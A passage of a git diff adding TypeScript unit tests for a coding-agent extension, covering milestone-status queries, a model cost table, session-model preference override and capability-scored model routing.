+    seedTask("M001", "S01", "T01", "done");
+    seedTask("M001", "S01", "T02", "done");
+    seedTask("M001", "S02", "T01", "pending");
+
+    const pi = makeMockPi();
+    registerQueryTools(pi);
+    const tool = pi.tools[0];
+
+    const result = await executeToolInDir(tool, { milestoneId: "M001" }, base);
+    const parsed = JSON.parse(result.content[0].text);
+
+    assert.equal(parsed.milestoneId, "M001");
+    assert.equal(parsed.title, "Test Milestone");
+    assert.equal(parsed.status, "active");
+    assert.equal(parsed.sliceCount, 2);
+    assert.equal(parsed.slices.length, 2);
+
+    const s01 = parsed.slices.find((s: any) => s.id === "S01");
+    assert.ok(s01, "S01 should be in slices");
+    assert.equal(s01.status, "complete");
+    assert.equal(s01.taskCounts.total, 2);
+    assert.equal(s01.taskCounts.done, 2);
+
+    const s02 = parsed.slices.find((s: any) => s.id === "S02");
+    assert.ok(s02, "S02 should be in slices");
+    assert.equal(s02.status, "active");
+    assert.equal(s02.taskCounts.pending, 1);
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+});
+
+// ─── Milestone with no slices ─────────────────────────────────────────────────
+
+test("gsd_milestone_status returns empty slices array for milestone with no slices", async () => {
+  const base = makeTmpBase();
+  try {
+    openTestDb(base);
+    seedMilestone("M002", "Empty Milestone");
+
+    const pi = makeMockPi();
+    registerQueryTools(pi);
+    const tool = pi.tools[0];
+
+    const result = await executeToolInDir(tool, { milestoneId: "M002" }, base);
+    const parsed = JSON.parse(result.content[0].text);
+
+    assert.equal(parsed.milestoneId, "M002");
+    assert.equal(parsed.sliceCount, 0);
+    assert.deepEqual(parsed.slices, []);
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+});
+
+// ─── Missing milestone ────────────────────────────────────────────────────────
+
+test("gsd_milestone_status returns not-found for missing milestone", async () => {
+  const base = makeTmpBase();
+  try {
+    openTestDb(base);
+
+    const pi = makeMockPi();
+    registerQueryTools(pi);
+    const tool = pi.tools[0];
+
+    const result = await executeToolInDir(tool, { milestoneId: "M999" }, base);
+    assert.match(result.content[0].text, /M999.*not found/i);
+    assert.equal(result.details.found, false);
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+});
+
+// ─── DB unavailable ───────────────────────────────────────────────────────────
+
+test("gsd_milestone_status handles missing DB gracefully", async () => {
+  // Create a directory without .gsd/ to ensure ensureDbOpen has nothing to open
+  const base = join(tmpdir(), `gsd-no-db-${randomUUID()}`);
+  mkdirSync(base, { recursive: true });
+  closeDatabase(); // ensure no prior DB is open
+  try {
+    const pi = makeMockPi();
+    registerQueryTools(pi);
+    const tool = pi.tools[0];
+
+    const result = await executeToolInDir(tool, { milestoneId: "M001" }, base);
+    assert.match(result.content[0].text, /GSD database is not available/);
+    assert.equal(result.details.error, "db_unavailable");
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/milestone-transition-state-rebuild.test.ts b/src/resources/extensions/gsd/tests/milestone-transition-state-rebuild.test.ts
index f76788deb..b2ab7e61a 100644
--- a/src/resources/extensions/gsd/tests/milestone-transition-state-rebuild.test.ts
+++ b/src/resources/extensions/gsd/tests/milestone-transition-state-rebuild.test.ts
@@ -49,19 +49,18 @@ test("auto/phases.ts milestone transition block resets completed-units.json", ()
     "utf-8",
   );
 
-  // completed-units.json must be cleared during milestone transition
-  // Look for the reset pattern within the transition block
+  // completed-units.json must be archived and cleared during milestone transition
   const transitionStart = phasesSrc.indexOf("Milestone transition");
-  const transitionResetSection = phasesSrc.indexOf(
-    "s.completedUnits = []",
-    transitionStart,
-  );
+  assert.ok(transitionStart > 0, "Milestone transition block should exist");
+
+  // The old file is archived before being cleared (#2313)
+  const archiveSection = phasesSrc.indexOf("completed-units-", transitionStart);
   assert.ok(
-    transitionResetSection > 0,
-    "auto/phases.ts should reset s.completedUnits to [] during milestone transition",
+    archiveSection > 0,
+    "auto/phases.ts should archive completed-units.json during milestone transition",
   );
 
-  // The disk file should also be cleared
+  // The disk file should be cleared to an empty array
   assert.ok(
     phasesSrc.includes('atomicWriteSync(completedKeysPath, JSON.stringify([], null, 2))'),
     "auto/phases.ts should write empty array to completed-units.json during milestone transition",
diff --git a/src/resources/extensions/gsd/tests/model-cost-table.test.ts b/src/resources/extensions/gsd/tests/model-cost-table.test.ts
index 98906c083..4ab8381f0 100644
--- a/src/resources/extensions/gsd/tests/model-cost-table.test.ts
+++ b/src/resources/extensions/gsd/tests/model-cost-table.test.ts
@@ -67,3 +67,37 @@ test("all cost table entries have valid data", () => {
     assert.ok(entry.updatedAt, `${entry.id} missing updatedAt`);
   }
 });
+
+// ─── #2885: openai-codex and modern OpenAI models in cost table ──────────────
+
+test("#2885: cost table includes openai-codex provider models", () => {
+  const ids = BUNDLED_COST_TABLE.map(e => e.id);
+  const codexModels = [
+    "gpt-5.1", "gpt-5.1-codex-max", "gpt-5.1-codex-mini",
+    "gpt-5.2", "gpt-5.2-codex", "gpt-5.3-codex", "gpt-5.3-codex-spark", "gpt-5.4",
+  ];
+  for (const model of codexModels) {
+    assert.ok(ids.includes(model), `cost table should include openai-codex model "${model}"`);
+  }
+});
+
+test("#2885: cost table includes modern OpenAI models", () => {
+  const ids = BUNDLED_COST_TABLE.map(e => e.id);
+  const newModels = [
+    "o4-mini", "o4-mini-deep-research",
+    "gpt-4.1", "gpt-4.1-mini", "gpt-4.1-nano",
+    "gpt-5", "gpt-5-mini", "gpt-5-nano", "gpt-5-pro",
+  ];
+  for (const model of newModels) {
+    assert.ok(ids.includes(model), `cost table should include modern OpenAI model "${model}"`);
+  }
+});
+
+test("#2885: lookupModelCost returns costs for new models (not 999 fallback)", () => {
+  const newModels = ["o4-mini", "gpt-4.1", "gpt-5", "gpt-5.4", "gpt-5.1-codex-mini"];
+  for (const model of newModels) {
+    const entry = lookupModelCost(model);
+    assert.ok(entry, `lookupModelCost should find "${model}"`);
+    assert.ok(entry.inputPer1k < 999, `${model} should have a real cost, not the 999 fallback`);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/model-isolation.test.ts b/src/resources/extensions/gsd/tests/model-isolation.test.ts
index 088d24079..6dd107b12 100644
--- a/src/resources/extensions/gsd/tests/model-isolation.test.ts
+++ b/src/resources/extensions/gsd/tests/model-isolation.test.ts
@@ -1,5 +1,6 @@
 /**
- * Tests for model config isolation between concurrent instances (#650, #1065).
+ * Tests for model config isolation between concurrent instances (#650, #1065)
+ * and GSD preferences override of settings.json defaults (#3517).
  */
 
 import { describe, it, beforeEach, afterEach } from "node:test";
@@ -155,3 +156,76 @@ describe("session model recovery on error (#1065)", () => {
       "Recovery should be skipped when no session model was captured");
   });
 });
+
+// ─── GSD Preferences override settings.json (#3517) ─────────────────────────
+
+describe("GSD preferences override settings.json for session model (#3517)", () => {
+  it("preferredModel takes priority over ctx.model when both are available", () => {
+    // Simulates auto-start.ts logic: preferredModel ?? ctx.model snapshot
+    const preferredModel = { provider: "openai-codex", id: "gpt-5.4" };
+    const ctxModel = { provider: "claude-code", id: "claude-sonnet-4-6" };
+
+    const startModelSnapshot = preferredModel
+      ?? { provider: ctxModel.provider, id: ctxModel.id };
+
+    assert.equal(startModelSnapshot.provider, "openai-codex",
+      "preferredModel provider should win over ctx.model");
+    assert.equal(startModelSnapshot.id, "gpt-5.4",
+      "preferredModel id should win over ctx.model");
+  });
+
+  it("falls back to ctx.model when no GSD preferences are configured", () => {
+    const preferredModel: { provider: string; id: string } | undefined = undefined;
+    const ctxModel = { provider: "claude-code", id: "claude-sonnet-4-6" };
+
+    const startModelSnapshot = preferredModel
+      ?? { provider: ctxModel.provider, id: ctxModel.id };
+
+    assert.equal(startModelSnapshot.provider, "claude-code",
+      "should fall back to ctx.model provider when no preferences");
+    assert.equal(startModelSnapshot.id, "claude-sonnet-4-6",
+      "should fall back to ctx.model id when no preferences");
+  });
+
+  it("handles null ctx.model with no preferences gracefully", () => {
+    const preferredModel: { provider: string; id: string } | undefined = undefined;
+    // Use a function to prevent TS from narrowing to `never` in the ternary
+    function getCtxModel(): { provider: string; id: string } | null { return null; }
+    const ctxModel = getCtxModel();
+
+    const startModelSnapshot = preferredModel
+      ?? (ctxModel ? { provider: ctxModel.provider, id: ctxModel.id } : null);
+
+    assert.equal(startModelSnapshot, null,
+      "should be null when neither preferences nor ctx.model exist");
+  });
+
+  it("bare model ID uses session provider when available", () => {
+    // Simulates: PREFERENCES.md has "gpt-5.4" (no provider), session is openai-codex
+    const preferredModel = { provider: "openai-codex", id: "gpt-5.4" }; // from resolveDefaultSessionModel("openai-codex")
+    const ctxModel = { provider: "openai-codex", id: "claude-sonnet-4-6" };
+
+    const startModelSnapshot = preferredModel
+      ?? { provider: ctxModel.provider, id: ctxModel.id };
+
+    assert.equal(startModelSnapshot.provider, "openai-codex");
+    assert.equal(startModelSnapshot.id, "gpt-5.4",
+      "bare model ID from preferences should still override ctx.model");
+  });
+
+  it("stale settings.json does not leak when preferences are set", () => {
+    // Scenario: settings.json has claude-code, PREFERENCES.md has openai-codex
+    const settingsJsonDefault = { provider: "claude-code", id: "claude-sonnet-4-6" };
+    const preferencesModel = { provider: "openai-codex", id: "gpt-5.4" };
+
+    // auto-start.ts captures preferredModel first, which preempts settingsJsonDefault
+    const startModelSnapshot = preferencesModel ?? settingsJsonDefault;
+
+    assert.equal(startModelSnapshot.provider, "openai-codex",
+      "PREFERENCES.md must override stale settings.json provider");
+    assert.equal(startModelSnapshot.id, "gpt-5.4",
+      "PREFERENCES.md must override stale settings.json model");
+    assert.notEqual(startModelSnapshot.provider, settingsJsonDefault.provider,
+      "settings.json provider must NOT leak through");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/model-router.test.ts b/src/resources/extensions/gsd/tests/model-router.test.ts
index c7af7fcca..c81242215 100644
--- a/src/resources/extensions/gsd/tests/model-router.test.ts
+++ b/src/resources/extensions/gsd/tests/model-router.test.ts
@@ -1,12 +1,17 @@
-import test from "node:test";
+import test, { describe } from "node:test";
 import assert from "node:assert/strict";
 
 import {
   resolveModelForComplexity,
   escalateTier,
   defaultRoutingConfig,
+  scoreModel,
+  computeTaskRequirements,
+  scoreEligibleModels,
+  getEligibleModels,
+  MODEL_CAPABILITY_PROFILES,
 } from "../model-router.js";
-import type { DynamicRoutingConfig, RoutingDecision } from "../model-router.js";
+import type { DynamicRoutingConfig, RoutingDecision, ModelCapabilities } from "../model-router.js";
 import type { ClassificationResult } from "../complexity-classifier.js";
 
 // ─── Helpers ─────────────────────────────────────────────────────────────────
@@ -165,3 +170,589 @@ test("falls back to configured model when no light-tier model available", () =>
   assert.equal(result.modelId, "claude-opus-4-6");
   assert.equal(result.wasDowngraded, false);
 });
+
+// ─── #2192: Unknown models honor explicit config ─────────────────────────────
+
+test("#2192: unknown model is not downgraded — respects user config", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  const result = resolveModelForComplexity(
+    makeClassification("light"),
+    { primary: "some-future-unknown-model-v9", fallbacks: [] },
+    config,
+    ["some-future-unknown-model-v9", ...AVAILABLE_MODELS],
+  );
+  assert.equal(result.modelId, "some-future-unknown-model-v9", "unknown model should be used as-is");
+  assert.equal(result.wasDowngraded, false, "should not be downgraded");
+  assert.ok(result.reason.includes("not in the known tier map"), "reason should explain why");
+});
+
+test("#2192: unknown model with provider prefix is not downgraded", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  const result = resolveModelForComplexity(
+    makeClassification("standard"),
+    { primary: "custom-provider/my-model-v3", fallbacks: [] },
+    config,
+    ["custom-provider/my-model-v3", ...AVAILABLE_MODELS],
+  );
+  assert.equal(result.modelId, "custom-provider/my-model-v3");
+  assert.equal(result.wasDowngraded, false);
+});
+
+test("#2192: known model is still downgraded normally", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  // claude-opus-4-6 is known as "heavy" — a light request should downgrade
+  const result = resolveModelForComplexity(
+    makeClassification("light"),
+    { primary: "claude-opus-4-6", fallbacks: [] },
+    config,
+    AVAILABLE_MODELS,
+  );
+  assert.equal(result.wasDowngraded, true, "known heavy model should still be downgraded for light tasks");
+  assert.notEqual(result.modelId, "claude-opus-4-6");
+});
+
+// ─── Capability Scoring (ADR-004 Phase 2) ───────────────────────────────────
+
+test("defaultRoutingConfig includes capability_routing: true", () => {
+  const config = defaultRoutingConfig();
+  assert.equal(config.capability_routing, true);
+});
+
+test("scoreModel computes weighted average of capability × requirement", () => {
+  const caps: ModelCapabilities = {
+    coding: 90, debugging: 80, research: 70,
+    reasoning: 85, speed: 50, longContext: 60, instruction: 75,
+  };
+  const reqs = { coding: 0.9, reasoning: 0.5 };
+  const score = scoreModel(caps, reqs);
+  // Expected: (0.9*90 + 0.5*85) / (0.9 + 0.5) = (81 + 42.5) / 1.4 = 88.21...
+  assert.ok(Math.abs(score - 88.21) < 0.1, `score ${score} should be ~88.21`);
+});
+
+test("scoreModel returns 50 for empty requirements", () => {
+  const caps: ModelCapabilities = {
+    coding: 90, debugging: 80, research: 70,
+    reasoning: 85, speed: 50, longContext: 60, instruction: 75,
+  };
+  const score = scoreModel(caps, {});
+  assert.equal(score, 50);
+});
+
+test("computeTaskRequirements returns base vector for known unit type", () => {
+  const reqs = computeTaskRequirements("execute-task");
+  assert.ok(reqs.coding !== undefined && reqs.coding > 0);
+});
+
+test("computeTaskRequirements boosts instruction for docs-tagged tasks", () => {
+  const reqs = computeTaskRequirements("execute-task", { tags: ["docs"] });
+  assert.ok((reqs.instruction ?? 0) >= 0.8);
+  assert.ok((reqs.coding ?? 1) <= 0.4);
+});
+
+test("computeTaskRequirements returns generic vector for unknown unit type", () => {
+  const reqs = computeTaskRequirements("unknown-unit");
+  assert.ok(reqs.reasoning !== undefined);
+});
+
+test("resolveModelForComplexity uses capability scoring when enabled", () => {
+  const config: DynamicRoutingConfig = {
+    ...defaultRoutingConfig(),
+    enabled: true,
+    capability_routing: true,
+  };
+  const result = resolveModelForComplexity(
+    makeClassification("light"),
+    { primary: "claude-opus-4-6", fallbacks: [] },
+    config,
+    ["claude-opus-4-6", "claude-haiku-4-5", "gpt-4o-mini"],
+    "execute-task",
+  );
+  assert.equal(result.wasDowngraded, true);
+  assert.equal(result.selectionMethod, "capability-scored");
+});
+
+test("resolveModelForComplexity falls back to tier-only when capability_routing is false", () => {
+  const config: DynamicRoutingConfig = {
+    ...defaultRoutingConfig(),
+    enabled: true,
+    capability_routing: false,
+  };
+  const result = resolveModelForComplexity(
+    makeClassification("light"),
+    { primary: "claude-opus-4-6", fallbacks: [] },
+    config,
+    ["claude-opus-4-6", "claude-haiku-4-5", "gpt-4o-mini"],
+  );
+  assert.equal(result.wasDowngraded, true);
+  assert.ok(!result.selectionMethod || result.selectionMethod === "tier-only");
+});
+
+test("MODEL_CAPABILITY_PROFILES has entries for core models", () => {
+  const profiledModels = Object.keys(MODEL_CAPABILITY_PROFILES);
+  assert.ok(profiledModels.length >= 9, `Expected ≥9 profiles, got ${profiledModels.length}`);
+  assert.ok(MODEL_CAPABILITY_PROFILES["claude-opus-4-6"]);
+  assert.ok(MODEL_CAPABILITY_PROFILES["claude-haiku-4-5"]);
+});
+
+// ─── #2885: openai-codex and modern OpenAI models in tier map ────────────────
+
+test("#2885: openai-codex light-tier models are recognized", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  const lightModels = ["gpt-4.1-mini", "gpt-4.1-nano", "gpt-5-mini", "gpt-5-nano", "gpt-5.1-codex-mini", "gpt-5.3-codex-spark"];
+  for (const model of lightModels) {
+    const result = resolveModelForComplexity(
+      makeClassification("light"),
+      { primary: model, fallbacks: [] },
+      config,
+      [model, ...AVAILABLE_MODELS],
+    );
+    // Model is known AND light-tier, so requesting light should NOT downgrade
+    assert.equal(result.wasDowngraded, false, `${model} should be known as light tier (wasDowngraded)`);
+    assert.equal(result.modelId, model, `${model} should be returned as-is for light tier`);
+    // Verify it IS known (not hitting the unknown-model bail-out)
+    assert.ok(!result.reason.includes("not in the known tier map"), `${model} should be in the known tier map`);
+  }
+});
+
+test("#2885: openai-codex standard-tier models are recognized", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  const standardModels = ["gpt-4.1", "gpt-5.1-codex-max"];
+  for (const model of standardModels) {
+    const result = resolveModelForComplexity(
+      makeClassification("standard"),
+      { primary: model, fallbacks: [] },
+      config,
+      [model, ...AVAILABLE_MODELS],
+    );
+    assert.equal(result.wasDowngraded, false, `${model} should be known as standard tier`);
+    assert.equal(result.modelId, model, `${model} should be returned as-is for standard tier`);
+    assert.ok(!result.reason.includes("not in the known tier map"), `${model} should be in the known tier map`);
+  }
+});
+
+test("#2885: openai-codex heavy-tier models are recognized", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  const heavyModels = ["gpt-5", "gpt-5-pro", "gpt-5.1", "gpt-5.2", "gpt-5.2-codex", "gpt-5.3-codex", "gpt-5.4", "o4-mini", "o4-mini-deep-research"];
+  for (const model of heavyModels) {
+    const result = resolveModelForComplexity(
+      makeClassification("heavy"),
+      { primary: model, fallbacks: [] },
+      config,
+      [model, ...AVAILABLE_MODELS],
+    );
+    assert.equal(result.wasDowngraded, false, `${model} should be known as heavy tier`);
+    assert.equal(result.modelId, model, `${model} should be returned as-is for heavy tier`);
+    assert.ok(!result.reason.includes("not in the known tier map"), `${model} should be in the known tier map`);
+  }
+});
+
+test("#2885: heavy openai-codex model downgrades to light for light task", () => {
+  const config = { ...defaultRoutingConfig(), enabled: true };
+  const result = resolveModelForComplexity(
+    makeClassification("light"),
+    { primary: "gpt-5.4", fallbacks: [] },
+    config,
+    ["gpt-5.4", "gpt-4.1-nano", ...AVAILABLE_MODELS],
+  );
+  assert.equal(result.wasDowngraded, true, "heavy model should downgrade for light task");
+  // Should pick a light-tier model
+  assert.notEqual(result.modelId, "gpt-5.4", "should not use the heavy model for light task");
+});
+// ─── scoreModel ──────────────────────────────────────────────────────────────
+
+describe("scoreModel", () => {
+  const sonnetProfile: ModelCapabilities = MODEL_CAPABILITY_PROFILES["claude-sonnet-4-6"]!;
+
+  test("produces correct weighted average for two dimensions (coding:0.9, instruction:0.7)", () => {
+    // (0.9*85 + 0.7*85) / (0.9+0.7) = (76.5+59.5)/1.6 = 136/1.6 = 85.0
+    const score = scoreModel(sonnetProfile, { coding: 0.9, instruction: 0.7 });
+    assert.ok(Math.abs(score - 85.0) < 0.01, `Expected ~85.0, got ${score}`);
+  });
+
+  test("returns 50 when requirements is empty", () => {
+    const score = scoreModel(sonnetProfile, {});
+    assert.equal(score, 50);
+  });
+
+  test("returns correct score for single dimension coding:1.0", () => {
+    // coding=90 for claude-opus-4-6
+    const opusProfile = MODEL_CAPABILITY_PROFILES["claude-opus-4-6"]!;
+    const score = scoreModel(opusProfile, { coding: 1.0 });
+    assert.equal(score, 95);
+  });
+
+  test("handles all 7 dimensions correctly", () => {
+    // Uniform weight 1.0 on every dim → average of all dim values
+    const profile: ModelCapabilities = {
+      coding: 60, debugging: 60, research: 60, reasoning: 60,
+      speed: 60, longContext: 60, instruction: 60,
+    };
+    const reqs: Partial<Record<keyof ModelCapabilities, number>> = {
+      coding: 1.0, debugging: 1.0, research: 1.0, reasoning: 1.0,
+      speed: 1.0, longContext: 1.0, instruction: 1.0,
+    };
+    const score = scoreModel(profile, reqs);
+    assert.equal(score, 60);
+  });
+});
+
+// ─── computeTaskRequirements ─────────────────────────────────────────────────
+
+describe("computeTaskRequirements", () => {
+  test("execute-task with no metadata returns base vector", () => {
+    const req = computeTaskRequirements("execute-task", undefined);
+    assert.deepStrictEqual(req, { coding: 0.9, instruction: 0.7, speed: 0.3 });
+  });
+
+  test("execute-task with tags:['docs'] adjusts requirements", () => {
+    const req = computeTaskRequirements("execute-task", { tags: ["docs"] });
+    assert.equal(req.instruction, 0.9);
+    assert.equal(req.coding, 0.3);
+    assert.equal(req.speed, 0.7);
+  });
+
+  test("execute-task with tags:['config'] adjusts requirements", () => {
+    const req = computeTaskRequirements("execute-task", { tags: ["config"] });
+    assert.equal(req.instruction, 0.9);
+  });
+
+  test("execute-task with complexityKeywords:['concurrency'] boosts debugging and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { complexityKeywords: ["concurrency"] });
+    assert.equal(req.debugging, 0.9);
+    assert.equal(req.reasoning, 0.8);
+  });
+
+  test("execute-task with complexityKeywords:['migration'] boosts reasoning and coding", () => {
+    const req = computeTaskRequirements("execute-task", { complexityKeywords: ["migration"] });
+    assert.equal(req.reasoning, 0.9);
+    assert.equal(req.coding, 0.8);
+  });
+
+  test("execute-task with fileCount:8 boosts coding and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { fileCount: 8 });
+    assert.equal(req.coding, 0.9);
+    assert.equal(req.reasoning, 0.7);
+  });
+
+  test("execute-task with estimatedLines:600 boosts coding and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { estimatedLines: 600 });
+    assert.equal(req.coding, 0.9);
+    assert.equal(req.reasoning, 0.7);
+  });
+
+  test("research-milestone returns correct base vector", () => {
+    const req = computeTaskRequirements("research-milestone");
+    assert.deepStrictEqual(req, { research: 0.9, longContext: 0.7, reasoning: 0.5 });
+  });
+
+  test("plan-slice returns correct base vector", () => {
+    const req = computeTaskRequirements("plan-slice");
+    assert.deepStrictEqual(req, { reasoning: 0.9, coding: 0.5 });
+  });
+
+  test("unknown-unit-type returns default reasoning requirement", () => {
+    const req = computeTaskRequirements("unknown-unit-type");
+    assert.deepStrictEqual(req, { reasoning: 0.5 });
+  });
+
+  test("non-execute-task with metadata ignores metadata refinements", () => {
+    // research-milestone should return the same vector regardless of metadata
+    const reqWithMeta = computeTaskRequirements("research-milestone", { tags: ["docs"], fileCount: 10 });
+    const reqWithout = computeTaskRequirements("research-milestone");
+    assert.deepStrictEqual(reqWithMeta, reqWithout);
+  });
+});
+
+// ─── scoreEligibleModels ─────────────────────────────────────────────────────
+
+describe("scoreEligibleModels", () => {
+  test("ranks models by score descending when scores differ by more than 2", () => {
+    // research: heavily weights research dimension. gemini-2.5-pro has 85 research vs sonnet's 75
+    const requirements = { research: 0.9, longContext: 0.7, reasoning: 0.5 };
+    const results = scoreEligibleModels(["claude-sonnet-4-6", "gemini-2.5-pro"], requirements);
+    assert.equal(results.length, 2);
+    assert.ok(results[0].score >= results[1].score, "Should be sorted by score descending");
+  });
+
+  test("within 2-point threshold, prefers cheaper model", () => {
+    // Use models without built-in profiles (both get score 50) so tie-break applies
+    // Then use known models with equal scores: force this via single unknown model pair
+    const requirements = { coding: 1.0 };
+    // model-a and model-b are both unknown → score=50, cost=Infinity → lexicographic
+    const results = scoreEligibleModels(["model-z", "model-a"], requirements);
+    // Both unknown: score=50 (within 2), cost=Infinity (equal) → lex: model-a first
+    assert.equal(results[0].modelId, "model-a");
+  });
+
+  test("single model returns array of one", () => {
+    const results = scoreEligibleModels(["claude-sonnet-4-6"], { coding: 0.9 });
+    assert.equal(results.length, 1);
+    assert.equal(results[0].modelId, "claude-sonnet-4-6");
+  });
+
+  test("unknown model with no profile gets score of 50", () => {
+    const results = scoreEligibleModels(["totally-unknown-model"], { coding: 1.0 });
+    assert.equal(results[0].score, 50);
+  });
+
+  test("capabilityOverrides deep-merges with built-in profile", () => {
+    const requirements = { coding: 1.0 };
+    // Override sonnet's coding to 30 — gpt-4o (coding=80) should win
+    const results = scoreEligibleModels(
+      ["claude-sonnet-4-6", "gpt-4o"],
+      requirements,
+      { "claude-sonnet-4-6": { coding: 30 } },
+    );
+    assert.equal(results[0].modelId, "gpt-4o", "gpt-4o should rank first after coding override");
+  });
+});
+
+// ─── getEligibleModels ───────────────────────────────────────────────────────
+
+describe("getEligibleModels", () => {
+  const ALL_MODELS = [
+    "claude-opus-4-6",   // heavy
+    "claude-sonnet-4-6", // standard
+    "claude-haiku-4-5",  // light
+    "gpt-4o-mini",       // light
+    "gpt-4o",            // standard
+  ];
+
+  test("returns light-tier models from available list sorted by cost", () => {
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    const result = getEligibleModels("light", ALL_MODELS, config);
+    assert.ok(result.length >= 1);
+    for (const id of result) {
+      assert.ok(
+        ["claude-haiku-4-5", "gpt-4o-mini"].includes(id),
+        `Expected light-tier model, got ${id}`,
+      );
+    }
+  });
+
+  test("returns standard-tier models from available list sorted by cost", () => {
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    const result = getEligibleModels("standard", ALL_MODELS, config);
+    assert.ok(result.length >= 1);
+    for (const id of result) {
+      assert.ok(
+        ["claude-sonnet-4-6", "gpt-4o"].includes(id),
+        `Expected standard-tier model, got ${id}`,
+      );
+    }
+  });
+
+  test("tier_models pinned model returns single-element array", () => {
+    const config: DynamicRoutingConfig = {
+      ...defaultRoutingConfig(),
+      tier_models: { light: "gpt-4o-mini" },
+    };
+    const result = getEligibleModels("light", ALL_MODELS, config);
+    assert.deepStrictEqual(result, ["gpt-4o-mini"]);
+  });
+
+  test("empty available list returns empty array", () => {
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    const result = getEligibleModels("light", [], config);
+    assert.equal(result.length, 0);
+  });
+
+  test("unknown models classified as standard appear in standard tier results", () => {
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    // unknown-model-xyz has no entry → defaults to standard tier
+    const result = getEligibleModels("standard", ["unknown-model-xyz"], config);
+    assert.ok(result.includes("unknown-model-xyz"), "Unknown model should appear in standard tier");
+  });
+});
+
+// ─── capability-aware routing integration ────────────────────────────────────
+
+describe("capability-aware routing integration", () => {
+  // All standard-tier models available alongside heavy (opus)
+  const MULTI_MODEL_AVAILABLE = [
+    "claude-opus-4-6",
+    "claude-sonnet-4-6",
+    "gpt-4o",
+    "gemini-2.5-pro",
+    "claude-haiku-4-5",
+    "gpt-4o-mini",
+  ];
+
+  // 1. Full pipeline with capability scoring active
+  test("full pipeline with capability_routing: true returns capability-scored decision", () => {
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: true, capability_routing: true };
+    // Configured primary is opus (heavy) — standard tier should trigger capability scoring
+    const result = resolveModelForComplexity(
+      { tier: "standard", reason: "test", downgraded: false },
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MULTI_MODEL_AVAILABLE,
+      "execute-task",
+      { tags: [], complexityKeywords: [], fileCount: 3, estimatedLines: 100, codeBlockCount: 0 },
+    );
+    assert.equal(result.selectionMethod, "capability-scored", "should use capability scoring when enabled with multiple eligible models");
+    assert.ok(result.capabilityScores !== undefined, "capabilityScores should be populated");
+    assert.ok(Object.keys(result.capabilityScores!).length > 1, "should have scores for multiple models");
+    assert.equal(result.wasDowngraded, true, "should be downgraded from opus");
+  });
+
+  // 2. capability_routing: false falls back to tier-only
+  test("capability_routing: false skips scoring and uses tier-only", () => {
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: true, capability_routing: false };
+    const result = resolveModelForComplexity(
+      { tier: "standard", reason: "test", downgraded: false },
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MULTI_MODEL_AVAILABLE,
+      "execute-task",
+      undefined,
+    );
+    assert.equal(result.selectionMethod, "tier-only", "capability_routing: false should use tier-only");
+    assert.equal(result.capabilityScores, undefined, "capabilityScores should be undefined for tier-only");
+  });
+
+  // 3. Single eligible model skips scoring
+  test("single eligible model skips capability scoring and uses tier-only", () => {
+    const config: DynamicRoutingConfig = {
+      ...defaultRoutingConfig(),
+      enabled: true,
+      capability_routing: true,
+      tier_models: { standard: "claude-sonnet-4-6" },
+    };
+    // Pin to single standard model — eligible.length === 1 → skips STEP 2
+    const result = resolveModelForComplexity(
+      { tier: "standard", reason: "test", downgraded: false },
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MULTI_MODEL_AVAILABLE,
+      "execute-task",
+      undefined,
+    );
+    // Single pinned model → tier-only (no scoring needed)
+    assert.equal(result.selectionMethod, "tier-only", "single eligible model should use tier-only");
+    assert.equal(result.modelId, "claude-sonnet-4-6", "should use the pinned model");
+  });
+
+  // 4. Unknown model with no profile gets uniform 50s and competes
+  test("unknown model with no profile gets uniform score of 50 and can compete", () => {
+    const unknownModel = "unknown-future-model-xyz";
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: true, capability_routing: true };
+    // Add unknown model to available list at standard tier (unknown → standard per D-15)
+    // scoring should still work with score=50 for the unknown model
+    const requirements = { coding: 0.9, instruction: 0.7, speed: 0.3 };
+    const scored = scoreEligibleModels([unknownModel, "claude-sonnet-4-6"], requirements);
+    const unknownEntry = scored.find(s => s.modelId === unknownModel);
+    assert.ok(unknownEntry !== undefined, "unknown model should be in scored results");
+    // Unknown model gets uniform 50s: (0.9*50 + 0.7*50 + 0.3*50) / (0.9+0.7+0.3) ≈ 50
+    assert.ok(Math.abs(unknownEntry!.score - 50) < 0.01, `expected score ~50, got ${unknownEntry!.score}`);
+  });
+
+  // 5. Capability overrides change scoring outcome
+  test("capabilityOverrides boost a model above another for same task", () => {
+    // sonnet: coding=85, gpt-4o: coding=80. Override gpt-4o coding to 99 → gpt-4o should win.
+    const requirements = { coding: 1.0 };
+    const overrides = { "gpt-4o": { coding: 99 } };
+    const scored = scoreEligibleModels(["claude-sonnet-4-6", "gpt-4o"], requirements, overrides);
+    assert.equal(scored[0].modelId, "gpt-4o", "overridden model should win for coding-heavy task");
+    assert.ok(scored[0].score > 90, `expected score > 90 after override, got ${scored[0].score}`);
+  });
+
+  // 5b. Capability overrides pass through resolveModelForComplexity to scoreEligibleModels
+  test("resolveModelForComplexity passes capabilityOverrides to scoring step", () => {
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: true, capability_routing: true };
+    // sonnet coding=85, gpt-4o coding=80. Override gpt-4o coding to 99 → gpt-4o should win.
